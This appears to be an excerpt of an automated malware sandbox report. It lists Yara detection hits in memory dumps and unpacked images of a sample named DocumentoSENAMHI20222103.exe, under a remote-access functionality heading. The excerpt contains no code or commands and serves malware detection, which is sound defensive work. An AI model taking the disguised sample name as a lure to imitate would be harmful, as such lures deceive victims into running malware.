Source: Yara match File source: 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DocumentoSENAMHI20222103.exe PID: 6576, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY